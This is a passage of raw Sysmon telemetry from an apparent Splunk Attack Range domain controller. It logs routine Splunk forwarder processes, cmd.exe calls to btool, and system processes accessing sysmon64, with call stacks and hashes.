Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002058Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3E0D-5F80-5800-000000007F01}40124016C:\Windows\system32\cmd.exe{733EE690-3E0D-5F80-5900-000000007F01}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002057Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.862{733EE690-3E0D-5F80-5900-000000007F01}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{733EE690-3E0D-5F80-5800-000000007F01}4012C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000002056Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0D-5F80-5800-000000007F01}4012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002055Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002054Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002053Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002052Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002051Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002050Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002049Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002048Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002047Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002046Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E0D-5F80-5800-000000007F01}4012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002045Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.854{733EE690-3E0B-5F80-4B00-000000007F01}38523848C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{733EE690-3E0D-5F80-5800-000000007F01}4012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002044Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.857{733EE690-3E0D-5F80-5800-000000007F01}4012C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E0B-5F80-4B00-000000007F01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002043Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.823{733EE690-3E0D-5F80-5700-000000007F01}39363932C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002042Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0D-5F80-5700-000000007F01}3936C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002041Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002040Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002039Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002038Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002037Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002036Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002035Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002034Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002033Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E0D-5F80-5700-000000007F01}3936C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002032Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002031Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:13.588{733EE690-3E0D-5F80-5600-000000007F01}39563952C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{733EE690-3E0D-5F80-5700-000000007F01}3936C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program 